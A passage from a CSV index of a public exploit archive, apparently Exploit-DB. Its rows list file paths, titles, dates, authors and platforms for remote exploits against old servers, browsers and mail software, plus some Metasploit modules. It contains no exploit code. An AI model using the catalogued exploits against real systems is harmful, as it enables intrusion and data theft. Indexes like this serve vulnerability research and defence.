Kane",hardware,remote, -21442,exploits/linux/remote/21442.c,"WU-IMAPd 2000/2001 - Partial Mailbox Attribute Remote Buffer Overflow (1)",2002-05-10,korty,linux,remote, -21443,exploits/linux/remote/21443.c,"WU-IMAPd 2000/2001 - Partial Mailbox Attribute Remote Buffer Overflow (2)",2002-05-10,"0x3a0x29 crew",linux,remote, -21444,exploits/multiple/remote/21444.txt,"Critical Path InJoin Directory Server 4.0 - Cross-Site Scripting",2002-05-10,"Nomad Mobile Research Centre",multiple,remote, -21445,exploits/multiple/remote/21445.txt,"Critical Path InJoin Directory Server 4.0 - File Disclosure",2002-05-10,"Nomad Mobile Research Centre",multiple,remote, -21446,exploits/windows/remote/21446.txt,"Ecometry SGDynamo 5.32/6.1/7.0 - Cross-Site Scripting",2002-04-17,frog,windows,remote, -21450,exploits/multiple/remote/21450.txt,"id Software Quake II Server 3.20/3.21 - Remote Information Disclosure",2002-05-15,Redix,multiple,remote, -21451,exploits/windows/remote/21451.txt,"Opera 5.12/6.0 - Frame Location Same Origin Policy Circumvention",2002-05-15,"Andreas Sandblad",windows,remote, -21452,exploits/windows/remote/21452.txt,"Microsoft Internet Explorer 5.0.1/6.0 - Content-Disposition Handling File Execution",2002-05-15,"Jani Laatikainen",windows,remote, -21453,exploits/multiple/remote/21453.txt,"SonicWALL SOHO3 6.3 - Content Blocking Script Injection",2002-05-17,"E M",multiple,remote, -21456,exploits/hardware/remote/21456.txt,"Cisco IDS Device Manager 3.1.1 - Arbitrary File Read Access",2002-05-17,"Andrew Lopacki",hardware,remote, -21466,exploits/windows/remote/21466.c,"Youngzsoft CMailServer 3.30/4.0 - Remote Buffer Overflow (1)",2002-05-20,anonymous,windows,remote, -21467,exploits/windows/remote/21467.c,"Youngzsoft CMailServer 3.30/4.0 - Remote Buffer Overflow (2)",2002-05-21,Over_G,windows,remote, -21468,exploits/windows/remote/21468.pl,"Matu FTP Server 1.13 - Remote Buffer Overflow",2002-05-22,Kanatoko,windows,remote, -21469,exploits/windows/remote/21469.txt,"NewAtlanta ServletExec/ISAPI 4.1 - Full Path Disclosure",2002-05-22,"Matt Moore",windows,remote, -21470,exploits/windows/remote/21470.txt,"NewAtlanta ServletExec/ISAPI 4.1 - File Disclosure",2002-05-22,"Matt Moore",windows,remote, -21475,exploits/windows/remote/21475.txt,"LocalWEB2000 2.1.0 Standard - File Disclosure",2002-05-24,"Tamer Sahin",windows,remote, -21483,exploits/windows/remote/21483.html,"Opera 6.0.1/6.0.2 - Arbitrary File Disclosure",2002-05-27,"GreyMagic Software",windows,remote, -21484,exploits/windows/remote/21484.c,"Yahoo! Messenger 5.0 - Call Center Buffer Overflow",2002-05-27,bob,windows,remote, -21485,exploits/windows/remote/21485.txt,"Microsoft Windows 95/98/2000/NT 4.0 - WinHlp Item Buffer Overflow",2002-05-27,"Next Generation Security",windows,remote, -21488,exploits/novell/remote/21488.txt,"Netscape Enterprise Web Server for Netware 4/5 5.0 - Information Disclosure",2002-05-29,Procheckup,novell,remote, -21490,exploits/multiple/remote/21490.txt,"Apache Tomcat 3.2.3/3.2.4 - 'Source.jsp' Information Disclosure",2002-05-29,"Richard Brain",multiple,remote, -21491,exploits/multiple/remote/21491.txt,"Apache Tomcat 3.2.3/3.2.4 - Example Files Web Root Full Path Disclosure",2002-05-29,"Richard Brain",multiple,remote, -21492,exploits/multiple/remote/21492.txt,"Apache Tomcat 3.2.3/3.2.4 - 'RealPath.jsp' Information Disclosuree",2002-05-29,"Richard Brain",multiple,remote, -21650,exploits/windows/remote/21650.txt,"Microsoft SQL Server 2000 - Database Consistency Checkers Buffer Overflow",2002-07-25,"Cesar Cerrudo",windows,remote, -21510,exploits/windows/remote/21510.pl,"Microsoft Internet Explorer 5/6 / Microsoft ISA Server 2000 / Microsoft Proxy Server 2.0 Gopher Client - Remote Buffer Overflow",2002-07-27,mat@monkey.org,windows,remote, -21511,exploits/multiple/remote/21511.c,"Nullsoft SHOUTcast 1.8.9 - Remote Buffer Overflow",2002-06-04,eSDee,multiple,remote, -21513,exploits/hardware/remote/21513.c,"Telindus 1100 Series Router - Administration Password Leak",2002-06-05,rubik,hardware,remote, -21515,exploits/windows/remote/21515.txt,"Microsoft Internet Explorer 5/6 - FTP Web View Cross-Site Scripting",2002-06-06,"Eiji James Yoshida",windows,remote, -21520,exploits/linux/remote/21520.py,"QNX 6.5.0 / QCONN 1.4.207944 - Remote Command Execution",2012-09-25,Mor!p3r,linux,remote, -21530,exploits/windows/remote/21530.txt,"Seanox DevWex Windows Binary 1.2002.520 - File Disclosure",2002-06-08,"Kistler Ueli",windows,remote, -21541,exploits/windows/remote/21541.txt,"Microsoft SQL Server 2000 - SQLXML Script Injection",2002-06-12,"Matt Moore",windows,remote, -21542,exploits/windows/remote/21542.c,"AnalogX SimpleServer:WWW 1.16 - Web Server Buffer Overflow",2002-06-13,"Auriemma Luigi",windows,remote, -21548,exploits/cfm/remote/21548.txt,"ColdFusion MX - Missing Template Cross-Site Scripting",2002-06-13,Macromedia,cfm,remote, -40415,exploits/multiple/remote/40415.rb,"Metasploit Web UI - Diagnostic Console Command Execution (Metasploit)",2016-09-22,Metasploit,multiple,remote, -21554,exploits/windows/remote/21554.txt,"Imatix Xitami 2.5 - GSL Template Cross-Site Scripting",2002-06-14,"Matthew Murphy",windows,remote, -21555,exploits/windows/remote/21555.txt,"Cisco Secure ACS for Windows NT 3.0 - Cross-Site Scripting",2002-06-14,"Dave Palumbo",windows,remote, -21559,exploits/multiple/remote/21559.c,"Apache 1.x/2.0.x - Chunked-Encoding Memory Corruption (1)",2002-06-17,"Gobbles Security",multiple,remote, -21560,exploits/multiple/remote/21560.c,"Apache 1.x/2.0.x - Chunked-Encoding Memory Corruption (2)",2002-06-17,"Gobbles Security",multiple,remote, -21571,exploits/irix/remote/21571.c,"SGI IRIX 6.x - rpc.xfsmd Remote Command Execution",2002-06-20,"Last Stage of Delirium",irix,remote, -21574,exploits/unix/remote/21574.txt,"Pirch IRC 98 Client - Malformed Link Buffer Overrun",2002-06-21,"David Rude II",unix,remote, -21576,exploits/windows/remote/21576.txt,"Working Resources BadBlue 1.7 - 'ext.dll' Cross-Site Scripting",2002-06-23,"Matthew Murphy",windows,remote, -21578,exploits/unix/remote/21578.txt,"OpenSSH 3.x - Challenge-Response Buffer Overflow (1)",2002-06-24,"Christophe Devine",unix,remote, -21579,exploits/unix/remote/21579.txt,"OpenSSH 3.x - Challenge-Response Buffer Overflow (2)",2002-06-24,"Gobbles Security",unix,remote, -21581,exploits/windows/remote/21581.txt,"Summit Computer Networks Lil' HTTP Server 2 - 'URLCount.cgi' HTML Injection",2002-06-27,"Matthew Murphy",windows,remote, -21582,exploits/windows/remote/21582.txt,"Macromedia JRun 3/4 - Administrative Authentication Bypass",2002-06-28,"Matt Moore",windows,remote, -21586,exploits/linux/remote/21586.txt,"E-Guest 1.1 - Server Side Include Arbitrary Command Execution",2002-06-30,DownBload,linux,remote, -21589,exploits/windows/remote/21589.pl,"AnalogX Proxy 4.0 - Socks4A Buffer Overflow",2002-07-01,Kanatoko,windows,remote, -21591,exploits/windows/remote/21591.sh,"ArGoSoft 1.8 Mail Server - Directory Traversal",2002-07-06,"team n.finity",windows,remote, -21595,exploits/windows/remote/21595.c,"Nullsoft Winamp 2.80 - Automatic Update Check Buffer Overflow",2002-07-03,anonymous,windows,remote, -21596,exploits/osx/remote/21596.txt,"Apple Mac OSX 10.1.x - SoftwareUpdate Arbitrary Package Installation",2002-07-08,"Russell Harding",osx,remote, -21597,exploits/windows/remote/21597.txt,"Key Focus KF Web Server 1.0.2 - Directory Contents Disclosure",2002-07-08,Securiteinfo.com,windows,remote, -21599,exploits/windows/remote/21599.txt,"Working Resources BadBlue 1.7.3 - 'cleanSearchString()' Cross-Site Scripting",2002-07-08,"Matthew Murphy",windows,remote, -21601,exploits/windows/remote/21601.c,"Microsoft Foundation Class Library 7.0 - ISAPI Buffer Overflow",2002-07-08,"Matthew Murphy",windows,remote, -21602,exploits/linux/remote/21602.txt,"icecast server 1.3.12 - Directory Traversal Information Disclosure",2002-07-09,glaive,linux,remote, -21603,exploits/multiple/remote/21603.txt,"iPlanet Web Server 4.1 - Search Component File Disclosure",2002-07-09,"Qualys Corporation",multiple,remote, -21604,exploits/linux/remote/21604.txt,"Apache Tomcat 4.0.3 - Servlet Mapping Cross-Site Scripting",2002-07-10,"Matt Moore",linux,remote, -21605,exploits/windows/remote/21605.txt,"Apache Tomcat 4.0.3 - Denial of Service 'Device Name' / Cross-Site Scripting",2002-07-10,"Matt Moore",windows,remote, -21606,exploits/windows/remote/21606.txt,"Microsoft Internet Explorer 5/6 - OBJECT Tag Same Origin Policy Violation",2002-07-10,"Thor Larholm",windows,remote, -21607,exploits/windows/remote/21607.txt,"GoAhead Web Server 2.1.x - URL Encoded Slash Directory Traversal",2002-07-10,"Matt Moore",windows,remote, -21608,exploits/windows/remote/21608.txt,"GoAhead Web Server 2.1.x - Error Page Cross-Site Scripting",2002-07-10,"Matt Moore",windows,remote, -21611,exploits/windows/remote/21611.txt,"Summit Computer Networks Lil' HTTP Server 2.1/2.2 - 'pbcgi.cgi' Cross-Site Scripting",2002-07-11,"Matthew Murphy",windows,remote, -21613,exploits/windows/remote/21613.txt,"Microsoft IIS 4.0/5.0 - SMTP Service Encapsulated SMTP Address (MS99-027)",2002-07-12,JWC,windows,remote, -21614,exploits/freebsd/remote/21614.c,"ATPhttpd 0.4b - Remote Buffer Overflow",2002-07-12,badc0ded,freebsd,remote, -21615,exploits/windows/remote/21615.c,"Real Networks RealJukebox 1.0.2/RealOne 6.0.10 Player Gold - Skinfile Buffer Overflow",2002-07-12,UNYUN,windows,remote, -21616,exploits/windows/remote/21616.txt,"Working Resources 1.7.3 BadBlue - Null Byte File Disclosure",2002-06-13,"Matthew Murphy",windows,remote, -21618,exploits/windows/remote/21618.txt,"Mirabilis ICQ 2002 - Sound Scheme Remote Configuration Modification",2002-07-15,xLaNT,windows,remote, -21619,exploits/windows/remote/21619.txt,"AOL Instant Messenger 4.x - Unauthorized Actions",2002-07-16,orb,windows,remote, -21625,exploits/windows/remote/21625.pl,"Trend Micro Interscan VirusWall for Windows NT 3.52 - Space Gap Scan Bypass",2002-07-18,SecuriTeam,windows,remote, -21626,exploits/windows/remote/21626.c,"3.3/4.0/4.2 MERCUR MailServer - Control-Service Buffer Overflow",2002-07-16,anonymous,windows,remote, -22072,exploits/linux/remote/22072.c,"Cobalt RaQ4 - Administrative Interface Command Execution",2002-12-05,grazer,linux,remote, -21627,exploits/multiple/remote/21627.txt,"Oracle Reports Server 6.0.8/9.0.2 - Information Disclosure",2002-07-18,skp,multiple,remote, -21630,exploits/windows/remote/21630.html,"Working Resources 1.7.x BadBlue - Administrative Interface Arbitrary File Access",2002-07-20,"Matthew Murphy",windows,remote, -21631,exploits/windows/remote/21631.txt,"Microsoft Outlook Express 5/6 - Spoofable File Extensions",2002-07-20,"Matthew Murphy",windows,remote, -21633,exploits/windows/remote/21633.c,"SmartMax MailMax 4.8 - Popmax Buffer Overflow",2002-07-20,anonymous,windows,remote, -21635,exploits/windows/remote/21635.c,"SecureCRT 2.4/3.x/4.0 - SSH1 Identifier String Buffer Overflow (2)",2002-07-23,"andrea lisci",windows,remote, -21636,exploits/windows/remote/21636.txt,"Opera 6.0.1 / Microsoft Internet Explorer 5/6 - JavaScript Modifier Keypress Event Subversion",2002-07-23,"Andreas Sandblad",windows,remote, -21638,exploits/multiple/remote/21638.txt,"Mozilla 0.9.x/1.0 - JavaScript URL Host Spoofing Arbitrary Cookie Access",2002-07-24,"Andreas Sandblad",multiple,remote, -21639,exploits/windows/remote/21639.c,"VMware GSX Server 2.0 - Authentication Server Buffer Overflow",2002-07-24,"Zag & Glcs",windows,remote, -21641,exploits/cgi/remote/21641.txt,"GNU Mailman 2.0.x - Subscribe Cross-Site Scripting",2002-07-24,office,cgi,remote, -21642,exploits/cgi/remote/21642.txt,"GNU Mailman 2.0.x - Admin Login Variant Cross-Site Scripting",2002-07-24,office,cgi,remote, -21643,exploits/windows/remote/21643.c,"CodeBlue 5.1 - SMTP Response Buffer Overflow",2002-07-24,doe,windows,remote, -21648,exploits/windows/remote/21648.txt,"Pegasus Mail 4.0 1 - Message Header Buffer Overflow",2002-07-24,"Auriemma Luigi",windows,remote, -21649,exploits/multiple/remote/21649.txt,"Cacheflow CacheOS 3.1.x/4.0.x/4.1 - Unresolved Domain Cross-Site Scripting",2002-07-24,T.Suzuki,multiple,remote, -21651,exploits/windows/remote/21651.txt,"Microsoft SQL Server 2000 - sp_MScopyscript SQL Injection",2002-07-25,"Cesar Cerrudo",windows,remote, -21652,exploits/windows/remote/21652.cpp,"Microsoft SQL Server 2000 - Resolution Service Heap Overflow",2002-07-25,"David Litchfield",windows,remote, -21654,exploits/windows/remote/21654.c,"IPSwitch IMail 6.x/7.0/7.1 - Web Messaging GET Buffer Overflow",2002-07-25,anonymous,windows,remote, -21662,exploits/windows/remote/21662.txt,"Microsoft Outlook Express 6 - '.XML' File Attachment Script Execution",2002-07-29,http-equiv,windows,remote, -21663,exploits/linux/remote/21663.c,"Fake Identd 0.9/1.x - Client Query Remote Buffer Overflow",2002-07-25,Jedi/Sector,linux,remote, -21670,exploits/windows/remote/21670.txt,"Microsoft Windows Media Player 6/7 - Filename Buffer Overflow",2002-07-30,ken@FTU,windows,remote, -21671,exploits/unix/remote/21671.c,"Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow",2002-07-30,spabam,unix,remote,80 -40347,exploits/unix/remote/40347.txt,"Apache mod_ssl OpenSSL < 0.9.6d / < 0.9.7-beta2 - 'openssl-too-open.c' SSL2 KEY_ARG Overflow",2002-09-17,"Solar Eclipse",unix,remote,80 -21675,exploits/windows/remote/21675.pl,"Trillian 0.x IRC Module - Remote Buffer Overflow",2002-07-31,"John C. Hennessy",windows,remote, -21677,exploits/solaris/remote/21677.txt,"Sun AnswerBook2 1.x - Unauthorized Administrative Script Access",2002-08-02,ghandi,solaris,remote, -21678,exploits/solaris/remote/21678.c,"Inso DynaWeb httpd 3.1/4.0.2/4.1 - Format String",2002-08-02,ghandi,solaris,remote, -21680,exploits/windows/remote/21680.pl,"Qualcomm Eudora 5 - MIME MultiPart Boundary Buffer Overflow",2002-08-05,Kanatoko,windows,remote, -21681,exploits/windows/remote/21681.html,"Opera 6.0.x - FTP View Cross-Site Scripting",2002-08-06,"Eiji James Yoshida",windows,remote, -21682,exploits/unix/remote/21682.txt,"Mozilla 1.0/1.1 - FTP View Cross-Site Scripting",2002-08-06,"Eiji James Yoshida",unix,remote, -21692,exploits/windows/remote/21692.txt,"Microsoft Internet Explorer 5/6 / Konqueror 2.2.2/3.0 / Weblogic Server 5/6/7 - Invalid X.509 Certificate Chain",2002-08-06,"Mike Benham",windows,remote, -21693,exploits/windows/remote/21693.nasl,"Microsoft SQL Server 2000 - User Authentication Remote Buffer Overflow",2002-08-06,"Dave Aitel",windows,remote, -21695,exploits/windows/remote/21695.pl,"Qualcomm Eudora 5/6 - File Attachment Spoofing (1)",2002-08-08,"Paul Szabo",windows,remote, -21696,exploits/windows/remote/21696.pl,"Qualcomm Eudora 5/6 - File Attachment Spoofing (2)",2002-08-08,"Paul Szabo",windows,remote, -21697,exploits/windows/remote/21697.txt,"Apache 2.0 - Encoded Backslash Directory Traversal",2002-08-09,"Auriemma Luigi",windows,remote, -21698,exploits/windows/remote/21698.txt,"BlueFace Falcon Web Server 2.0 - Error Message Cross-Site Scripting",2002-08-09,"Matt Murphy",windows,remote, -21699,exploits/hardware/remote/21699.txt,"Orinoco OEM Residential Gateway - SNMP Community String Remote Configuration",2002-08-09,"Foundstone Inc.",hardware,remote, -21704,exploits/unix/remote/21704.txt,"W3C CERN httpd 3.0 Proxy - Cross-Site Scripting",2002-08-12,"TAKAGI Hiromitsu",unix,remote, -21705,exploits/windows/remote/21705.txt,"Microsoft Internet Explorer 6 - File Attachment Script Execution",2002-08-13,http-equiv,windows,remote, -21706,exploits/linux/remote/21706.txt,"RedHat Interchange 4.8.x - Arbitrary File Read",2002-08-13,anonymous,linux,remote, -21707,exploits/windows/remote/21707.txt,"GoAhead Web Server 2.1 - Arbitrary Command Execution",2002-08-14,anonymous,windows,remote, -21709,exploits/windows/remote/21709.pl,"MyWebServer 1.0.2 - Search Request Remote Buffer Overflow",2002-08-14,D4rkGr3y,windows,remote, -21710,exploits/windows/remote/21710.txt,"MyWebServer 1.0.2 - Long HTTP Request HTML Injection",2002-08-14,D4rkGr3y,windows,remote, -21711,exploits/windows/remote/21711.html,"Microsoft Outlook Express 5/6 - MHTML URL Handler File Rendering",2002-08-15,http-equiv,windows,remote, -21717,exploits/windows/remote/21717.txt,"Microsoft Windows XP - HCP URI Handler Abuse",2002-08-15,"Shane Hird",windows,remote, -21718,exploits/windows/remote/21718.txt,"Microsoft SQL 2000/7.0 - Agent Jobs Privilege Escalation",2002-08-15,"David Litchfield",windows,remote, -21719,exploits/windows/remote/21719.txt,"Apache 2.0 - Full Path Disclosure",2002-08-16,"Auriemma Luigi",windows,remote, -21722,exploits/linux/remote/21722.pl,"Lynx 2.8.x - Command Line URL CRLF Injection",2002-08-19,"Ulf Harnhammar",linux,remote, -21725,exploits/linux/remote/21725.c,"MySQL 3.20.32/3.22.x/3.23.x - Null Root Password Weak Default Configuration (1)",2002-08-19,g0thm0g,linux,remote, -21726,exploits/linux/remote/21726.c,"MySQL 3.20.32/3.22.x/3.23.x - Null Root Password Weak Default Configuration (2)",2002-10-05,st0ic,linux,remote, -21731,exploits/novell/remote/21731.pl,"Novell NetWare 5.1/6.0 - POST Arbitrary Perl Code Execution",2002-08-20,"Dan Elder",novell,remote, -21734,exploits/unix/remote/21734.txt,"Apache Tomcat 4.1 - JSP Request Cross-Site Scripting",2002-08-21,Skinnay,unix,remote, -21735,exploits/windows/remote/21735.txt,"Abyss Web Server 1.0 - Encoded Backslash Directory Traversal",2002-08-22,"Auriemma Luigi",windows,remote, -21748,exploits/windows/remote/21748.txt,"Microsoft Internet Explorer 5/6 Legacy Text Formatting - ActiveX Component Buffer Overflow",2002-08-22,"Mark Litchfield",windows,remote, -21749,exploits/windows/remote/21749.txt,"Microsoft Internet Explorer 5/6 - XML Redirect File Disclosure",2002-08-23,"GreyMagic Software",windows,remote, -21750,exploits/windows/remote/21750.txt,"Microsoft Internet Explorer 5 - Dialog Same Origin Policy Bypass Variant (MS02-047)",2002-04-16,"GreyMagic Software",windows,remote, -21751,exploits/multiple/remote/21751.txt,"Blazix 1.2 - Special Character Handling Server Side Script Information Disclosure",2002-08-24,"Auriemma Luigi",multiple,remote, -21752,exploits/multiple/remote/21752.txt,"Blazix 1.2 - Password Protected Directory Information Disclosure",2002-08-25,"Auriemma Luigi",multiple,remote, -21753,exploits/windows/remote/21753.txt,"OmniHTTPd 1.1/2.0.x/2.4 - 'test.php' Sample Application Cross-Site Scripting",2002-08-26,"Matthew Murphy",windows,remote, -21754,exploits/windows/remote/21754.txt,"OmniHTTPd 1.1/2.0.x/2.4 - test.shtml Sample Application Cross-Site Scripting",2002-08-26,"Matthew Murphy",windows,remote, -21757,exploits/windows/remote/21757.txt,"OmniHTTPd 1.1/2.0.x/2.4 - Sample Application URL Encoded Newline HTML Injection",2002-08-26,"Matthew Murphy",windows,remote, -21759,exploits/windows/remote/21759.txt,"mIRC 6.0 - Scripting ASCTime Buffer Overflow",2002-08-27,"James Martin",windows,remote, -21764,exploits/windows/remote/21764.txt,"Microsoft Word 95/97/98/2000/2002 / Excel 2002 - INCLUDETEXT Document Sharing File Disclosure",2002-08-26,"Alex Gantman",windows,remote, -21765,exploits/linux/remote/21765.pl,"Webmin 0.x - 'RPC' Privilege Escalation",2002-08-28,"Noam Rathaus",linux,remote, -21767,exploits/multiple/remote/21767.txt,"NullLogic Null HTTPd 0.5 - Error Page Cross-Site Scripting",2002-09-02,"Matthew Murphy",multiple,remote, -21777,exploits/windows/remote/21777.txt,"Microsoft Internet Explorer 5 - IFrame/Frame Cross-Site/Zone Script Execution",2002-09-09,"GreyMagic Software",windows,remote, -21784,exploits/linux/remote/21784.c,"Netris 0.3/0.4/0.5 - Remote Memory Corruption",2002-09-09,V9,linux,remote, -21794,exploits/windows/remote/21794.txt,"Savant Web Server 3.1 - File Disclosure",2002-09-13,"Auriemma Luigi",windows,remote, -21800,exploits/multiple/remote/21800.txt,"DB4Web 3.4/3.6 - File Disclosure",2002-09-17,"Stefan Bagdohn",multiple,remote, -21801,exploits/multiple/remote/21801.txt,"DB4Web 3.4/3.6 - Connection Proxy",2002-09-17,"Stefan Bagdohn",multiple,remote, -21803,exploits/windows/remote/21803.txt,"Microsoft Internet Explorer 6 - URI Handler Restriction Circumvention",2002-09-10,"Thor Larholm",windows,remote, -21804,exploits/windows/remote/21804.c,"Trillian 0.6351/0.7x - Identd Buffer Overflow",2002-09-18,"Lance Fitz-Herbert",windows,remote, -21808,exploits/windows/remote/21808.txt,"Microsoft VM 2000/3000/3100/3188/3200/3300/3802/3805 series - JDBC Class Code Execution",2002-09-19,anonymous,windows,remote, -21810,exploits/windows/remote/21810.c,"Trillian 0.73/0.74 - IRC PRIVMSG Buffer Overflow",2002-09-19,"Lance Fitz-Herbert",windows,remote, -21812,exploits/windows/remote/21812.txt,"Microsoft Word 95/97/98/2000/2002 - 'INCLUDEPICTURE' Document Sharing File Disclosure",2002-09-20,"Richard Edwards",windows,remote, -21818,exploits/linux/remote/21818.c,"Null HTTPd 0.5 - Remote Heap Overflow",2002-09-23,eSDee,linux,remote, -21882,exploits/unix/remote/21882.txt,"Apache Tomcat 3.2 - Directory Disclosure",2002-10-01,"HP Security",unix,remote, -21883,exploits/windows/remote/21883.html,"Microsoft Internet Explorer 5 - Document Reference Zone Bypass",2002-10-01,"Liu Die Yu",windows,remote, -21885,exploits/multiple/remote/21885.txt,"Apache 1.3/2.0.x - Server Side Include Cross-Site Scripting",2002-10-02,mattmurphy,multiple,remote, -21827,exploits/hardware/remote/21827.txt,"HP Compaq Insight Manager - Web Interface Cross-Site Scripting",2002-09-23,"Taylor Huff",hardware,remote, -21837,exploits/windows/remote/21837.rb,"InduSoft Web Studio - Arbitrary File Upload / Remote Code Execution (Metasploit)",2012-10-10,Metasploit,windows,remote,4322 -21838,exploits/windows/remote/21838.rb,"Avaya WinPMD UniteHostRouter - Remote Buffer Overflow (Metasploit)",2012-10-10,Metasploit,windows,remote,3217 -21839,exploits/windows/remote/21839.rb,"NTR - ActiveX Control 'StopModule()' Remote Code Execution (Metasploit)",2012-10-10,Metasploit,windows,remote, -21840,exploits/windows/remote/21840.rb,"Microsoft Internet Explorer - execCommand Use-After-Free (MS12-063) (Metasploit)",2012-10-10,Metasploit,windows,remote, -21841,exploits/windows/remote/21841.rb,"NTR - ActiveX Control 'Check()' Method Buffer Overflow (Metasploit)",2012-10-10,Metasploit,windows,remote, -21842,exploits/windows/remote/21842.rb,"HP Application Lifecycle Management - 'XGO.ocx' ActiveX 'SetShapeNodeType()' Remote Code Execution (Metasploit)",2012-10-10,Metasploit,windows,remote, -21846,exploits/java/remote/21846.rb,"Oracle Business Transaction Management FlashTunnelService - Remote Code Execution (Metasploit)",2012-10-10,Metasploit,java,remote,7001 -21847,exploits/windows/remote/21847.rb,"Avaya IP Office Customer Call Reporter - 'ImageUpload.ashx' Remote Command Execution (Metasploit)",2012-10-10,Metasploit,windows,remote, -21849,exploits/unix/remote/21849.rb,"ZEN Load Balancer Filelog - Command Execution (Metasploit)",2012-10-10,Metasploit,unix,remote,444 -21850,exploits/linux/remote/21850.rb,"Samba 3.4.16/3.5.14/3.6.4 - SetInformationPolicy AuditEventsInfo Heap Overflow (Metasploit)",2012-10-10,Metasploit,linux,remote, -21851,exploits/unix/remote/21851.rb,"Webmin 1.580 - '/file/show.cgi' Remote Command Execution (Metasploit)",2012-10-10,Metasploit,unix,remote,10000 -21852,exploits/unix/remote/21852.rb,"QNX QCONN - Remote Command Execution (Metasploit)",2012-10-10,Metasploit,unix,remote, -21853,exploits/unix/remote/21853.txt,"Apache Tomcat 3/4 - 'DefaultServlet' File Disclosure",2002-09-24,"Rossen Raykov",unix,remote, -21857,exploits/linux/remote/21857.pl,"Monkey HTTP Server 0.1.4 - File Disclosure",2002-09-25,DownBload,linux,remote, -21858,exploits/linux/remote/21858.txt,"ACWeb 1.14/1.8 - Cross-Site Scripting",2002-09-25,DownBload,linux,remote, -21868,exploits/ios/remote/21868.rb,"Apple iOS Mobile Safari - LibTIFF Buffer Overflow (Metasploit)",2012-10-09,Metasploit,ios,remote, -21869,exploits/ios/remote/21869.rb,"Apple iOS Mobile Mail - LibTIFF Buffer Overflow (Metasploit)",2012-10-09,Metasploit,ios,remote, -21870,exploits/linux/remote/21870.txt,"Zope 2.x - Incorrect XML-RPC Request Information Disclosure",2002-09-26,"Rossen Raykov",linux,remote, -21876,exploits/multiple/remote/21876.txt,"SafeTP 1.46 - Passive Mode Internal IP Address Revealing",2002-09-28,"Jonathan G. Lampe",multiple,remote, -21880,exploits/multiple/remote/21880.txt,"Monkey HTTP Server 0.1/0.4/0.5 - Multiple Cross-Site Scripting Vulnerabilities",2002-09-30,DownBload,multiple,remote, -21888,exploits/windows/remote/21888.rb,"KeyHelp - ActiveX LaunchTriPane Remote Code Execution (Metasploit)",2012-10-11,Metasploit,windows,remote, -21897,exploits/windows/remote/21897.txt,"SurfControl SuperScout WebFilter for Windows 2000 - File Disclosure",2002-10-02,"Matt Moore",windows,remote, -21898,exploits/windows/remote/21898.txt,"SurfControl SuperScout WebFilter for Windows 2000 - SQL Injection",2002-10-02,"Matt Moore",windows,remote, -21902,exploits/windows/remote/21902.c,"Microsoft Windows XP/2000/NT 4.0 - Help Facility ActiveX Control Buffer Overflow",2002-10-07,ipxodi,windows,remote, -21910,exploits/windows/remote/21910.txt,"Microsoft IIS 5.0 - IDC Extension Cross-Site Scripting",2002-10-05,Roberto,windows,remote, -21913,exploits/windows/remote/21913.txt,"Citrix Published Applications - Information Disclosure",2002-10-07,wire,windows,remote, -21919,exploits/unix/remote/21919.sh,"Sendmail 8.12.6 - Compromised Source Backdoor",2002-10-08,netmask,unix,remote, -21927,exploits/multiple/remote/21927.rb,"Metasploit < 4.4 - pcap_log Plugin Privilege Escalation (Metasploit)",2012-10-12,0a29406d9794e4f9b30b3c5d6702c708,multiple,remote, -21932,exploits/windows/remote/21932.pl,"Microsoft Outlook Express 5.5/6.0 - S/MIME Buffer Overflow",2002-10-10,"Noam Rathaus",windows,remote, -21934,exploits/linux/remote/21934.txt,"KDE 3.0.x - KPF Icon Option File Disclosure",2002-10-11,"Ajay R Ramjatan",linux,remote, -21936,exploits/linux/remote/21936.c,"ATP httpd 0.4 - Single Byte Buffer Overflow",2002-10-05,thread,linux,remote, -21937,exploits/linux/remote/21937.c,"ghttpd 1.4.x - 'Log()' Remote Buffer Overflow",2002-10-07,flea,linux,remote, -21940,exploits/windows/remote/21940.txt,"Microsoft Internet Explorer 5/6 - Unauthorized Document Object Model Access",2002-10-15,"GreyMagic Software",windows,remote, -21942,exploits/multiple/remote/21942.java,"Ingenium Learning Management System 5.1/6.1 - Reversible Password Hash",2002-10-15,"Brian Enigma",multiple,remote, -21944,exploits/hardware/remote/21944.pl,"Cisco CatOS 5.x/6.1/7.3/7.4 - CiscoView HTTP Server Buffer Overflow",2002-10-16,blackangels,hardware,remote, -21945,exploits/linux/remote/21945.pl,"PlanetDNS PlanetWeb 1.14 - Remote Buffer Overflow",2002-10-17,"securma massine",linux,remote, -21947,exploits/unix/remote/21947.txt,"IBM Websphere Edge Server 3.6/4.0 - Cross-Site Scripting",2002-10-23,Rapid7,unix,remote, -21948,exploits/unix/remote/21948.txt,"IBM Websphere Edge Server 3.69/4.0 - HTTP Header Injection",2002-10-23,Rapid7,unix,remote, -21955,exploits/windows/remote/21955.java,"AN HTTPD 1.38/1.39/1.40/1.41 - SOCKS4 Request Buffer Overflow",2002-10-21,Kanatoko,windows,remote, -21958,exploits/windows/remote/21958.txt,"AOL Instant Messenger 4.8.2790 - Local File Execution",2002-10-22,"Blud Clot",windows,remote, -21959,exploits/windows/remote/21959.txt,"Microsoft Internet Explorer 5/6 - Cached Objects Zone Bypass",2002-10-22,"GreyMagic Software",windows,remote, -21964,exploits/windows/remote/21964.txt,"SolarWinds TFTP Server Standard Edition 5.0.55 - Directory Traversal",2002-10-25,"Matthew Murphy",windows,remote, -21974,exploits/unix/remote/21974.pl,"LPRNG html2ps 1.0 - Remote Command Execution",2002-10-31,"Sebastian Krahmer",unix,remote, -21983,exploits/hardware/remote/21983.c,"GlobalSunTech Access Point GL2422AP-0T - Information Disclosure",2002-11-04,"Tom Knienieder",hardware,remote, -21993,exploits/php/remote/21993.rb,"AjaXplorer - 'checkInstall.php' Remote Command Execution (Metasploit)",2012-10-16,Metasploit,php,remote, -21996,exploits/multiple/remote/21996.txt,"Lotus Domino 5.0.8-9 - Non-Existent NSF Database Banner Information Disclosure",2002-11-07,"Frank Perreault",multiple,remote, -21997,exploits/windows/remote/21997.txt,"Perception LiteServe 2.0.1 - DNS Wildcard Cross-Site Scripting",2002-11-08,"Matthew Murphy",windows,remote, -21998,exploits/linux/remote/21998.c,"CGIEmail 1.6 - Remote Buffer Overflow",2001-09-11,isox,linux,remote, -21999,exploits/windows/remote/21999.txt,"Perception LiteServe 2.0.1 - Directory Query String Cross-Site Scripting",2002-11-08,"Matthew Murphy",windows,remote, -22000,exploits/cgi/remote/22000.txt,"Zeus Web Server 4.0/4.1 - Admin Interface Cross-Site Scripting",2002-11-08,euronymous,cgi,remote, -22001,exploits/windows/remote/22001.txt,"Simple Web Server 0.5.1 - File 